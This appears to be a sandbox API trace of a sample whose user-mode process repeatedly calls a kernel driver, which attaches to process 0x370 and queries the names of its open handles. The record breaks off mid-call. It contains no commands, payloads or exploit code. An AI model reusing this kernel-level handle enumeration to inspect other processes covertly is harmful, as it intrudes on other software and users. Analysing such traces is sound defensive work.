[0223.835] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.835] ObQueryNameString (in: Object=0xfffffa800375a300, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.835] ObfDereferenceObject (Object=0xfffffa800375a300) returned 0x2 [0223.835] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.835] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.835] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.835] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0223.835] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.835] PsAcquireProcessExitSynchronization () returned 0x0 [0223.835] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.835] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800387a3c0, HandleInformation=0x0) returned 0x0 [0223.835] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.835] PsReleaseProcessExitSynchronization () returned 0x2 [0223.835] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.835] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.835] ObfDereferenceObject (Object=0xfffffa800387a3c0) returned 0x1 [0223.835] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.835] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.835] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.835] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x100, lpOverlapped=0x0) returned 1 [0223.835] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.835] PsAcquireProcessExitSynchronization () returned 0x0 [0223.835] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.835] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010689f0, HandleInformation=0x0) returned 0x0 [0223.835] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.835] PsReleaseProcessExitSynchronization () returned 0x2 [0223.835] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.835] ObQueryNameString (in: Object=0xfffff8a0010689f0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.835] ObfDereferenceObject (Object=0xfffff8a0010689f0) returned 0x2 [0223.836] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.836] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.836] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.836] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0223.836] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.836] PsAcquireProcessExitSynchronization () returned 0x0 [0223.836] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.836] ObReferenceObjectByHandle (in: Handle=0x544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00104cdb0, HandleInformation=0x0) returned 0x0 [0223.836] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.836] PsReleaseProcessExitSynchronization () returned 0x2 [0223.836] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.836] ObQueryNameString (in: Object=0xfffff8a00104cdb0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.836] ObfDereferenceObject (Object=0xfffff8a00104cdb0) returned 0x3 [0223.836] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.836] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.836] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.836] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0223.836] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.836] PsAcquireProcessExitSynchronization () returned 0x0 [0223.836] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.836] ObReferenceObjectByHandle (in: Handle=0x548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00104cdb0, HandleInformation=0x0) returned 0x0 [0223.836] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.836] PsReleaseProcessExitSynchronization () returned 0x2 [0223.836] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.836] ObQueryNameString (in: Object=0xfffff8a00104cdb0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.836] ObfDereferenceObject (Object=0xfffff8a00104cdb0) returned 0x3 [0223.836] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.836] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.836] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.837] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x100, lpOverlapped=0x0) returned 1 [0223.837] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.837] PsAcquireProcessExitSynchronization () returned 0x0 [0223.837] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.837] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00104ccf0, HandleInformation=0x0) returned 0x0 [0223.837] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.837] PsReleaseProcessExitSynchronization () returned 0x2 [0223.837] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.837] ObQueryNameString (in: Object=0xfffff8a00104ccf0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.837] ObfDereferenceObject (Object=0xfffff8a00104ccf0) returned 0x2 [0223.837] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.837] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.837] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.837] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0223.837] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.837] PsAcquireProcessExitSynchronization () returned 0x0 [0223.837] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.837] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800373b070, HandleInformation=0x0) returned 0x0 [0223.837] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.837] PsReleaseProcessExitSynchronization () returned 0x2 [0223.837] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.837] ObQueryNameString (in: Object=0xfffffa800373b070, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.837] ObfDereferenceObject (Object=0xfffffa800373b070) returned 0x3 [0223.837] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.837] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.837] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.837] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0223.838] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.838] PsAcquireProcessExitSynchronization () returned 0x0 [0223.838] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.838] ObReferenceObjectByHandle (in: Handle=0x68c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003943330, HandleInformation=0x0) returned 0x0 [0223.838] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.838] PsReleaseProcessExitSynchronization () returned 0x2 [0223.838] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.838] ObQueryNameString (in: Object=0xfffffa8003943330, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.838] ObfDereferenceObject (Object=0xfffffa8003943330) returned 0x2 [0223.838] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.838] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.838] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.838] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0223.838] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.838] PsAcquireProcessExitSynchronization () returned 0x0 [0223.838] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.838] ObReferenceObjectByHandle (in: Handle=0x6f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00126e1d0, HandleInformation=0x0) returned 0x0 [0223.838] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.838] PsReleaseProcessExitSynchronization () returned 0x2 [0223.838] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.838] ObQueryNameString (in: Object=0xfffff8a00126e1d0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.838] ObfDereferenceObject (Object=0xfffff8a00126e1d0) returned 0x2 [0223.838] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.838] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.838] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.838] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0223.838] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.838] PsAcquireProcessExitSynchronization () returned 0x0 [0223.838] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.839] ObReferenceObjectByHandle (in: Handle=0x6f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c01b00, HandleInformation=0x0) returned 0x0 [0223.839] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.839] PsReleaseProcessExitSynchronization () returned 0x2 [0223.839] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.839] ObQueryNameString (in: Object=0xfffff8a000c01b00, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.839] ObfDereferenceObject (Object=0xfffff8a000c01b00) returned 0x3 [0223.839] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.839] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.839] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.839] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0223.839] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.839] PsAcquireProcessExitSynchronization () returned 0x0 [0223.839] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.839] ObReferenceObjectByHandle (in: Handle=0x788, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a1cdd0, HandleInformation=0x0) returned 0x0 [0223.839] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.839] PsReleaseProcessExitSynchronization () returned 0x2 [0223.839] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.839] ObQueryNameString (in: Object=0xfffffa8003a1cdd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.839] ObfDereferenceObject (Object=0xfffffa8003a1cdd0) returned 0x1 [0223.839] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.839] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.839] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.839] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0223.839] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.839] PsAcquireProcessExitSynchronization () returned 0x0 [0223.839] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.840] ObReferenceObjectByHandle (in: Handle=0x7b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a18730, HandleInformation=0x0) returned 0x0 [0223.840] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.840] PsReleaseProcessExitSynchronization () returned 0x2 [0223.840] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.840] ObQueryNameString (in: Object=0xfffffa8003a18730, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.840] ObfDereferenceObject (Object=0xfffffa8003a18730) returned 0x1 [0223.840] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.840] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.840] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.840] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0223.840] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.840] PsAcquireProcessExitSynchronization () returned 0x0 [0223.840] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.840] ObReferenceObjectByHandle (in: Handle=0x7d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a1cf20, HandleInformation=0x0) returned 0x0 [0223.840] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.840] PsReleaseProcessExitSynchronization () returned 0x2 [0223.840] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.840] ObQueryNameString (in: Object=0xfffffa8003a1cf20, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.840] ObfDereferenceObject (Object=0xfffffa8003a1cf20) returned 0x1 [0223.840] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.840] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.840] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.840] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.840] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.841] PsAcquireProcessExitSynchronization () returned 0x0 [0223.841] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.841] ObReferenceObjectByHandle (in: Handle=0x7d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a1bf20, HandleInformation=0x0) returned 0x0 [0223.841] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.841] PsReleaseProcessExitSynchronization () returned 0x2 [0223.841] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.841] ObQueryNameString (in: Object=0xfffffa8003a1bf20, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.841] ObfDereferenceObject (Object=0xfffffa8003a1bf20) returned 0x1 [0223.841] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.841] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.841] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.841] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0223.841] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.841] PsAcquireProcessExitSynchronization () returned 0x0 [0223.841] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.841] ObReferenceObjectByHandle (in: Handle=0x7f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a1cc80, HandleInformation=0x0) returned 0x0 [0223.841] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.841] PsReleaseProcessExitSynchronization () returned 0x2 [0223.841] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.841] ObQueryNameString (in: Object=0xfffffa8003a1cc80, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.841] ObfDereferenceObject (Object=0xfffffa8003a1cc80) returned 0x1 [0223.841] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.841] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.841] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.842] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0223.842] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.842] PsAcquireProcessExitSynchronization () returned 0x0 [0223.842] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.842] ObReferenceObjectByHandle (in: Handle=0x8fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034d13f0, HandleInformation=0x0) returned 0x0 [0223.842] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.842] PsReleaseProcessExitSynchronization () returned 0x2 [0223.842] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.842] ObQueryNameString (in: Object=0xfffffa80034d13f0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.842] ObfDereferenceObject (Object=0xfffffa80034d13f0) returned 0x2 [0223.842] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.842] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.842] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.051] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, 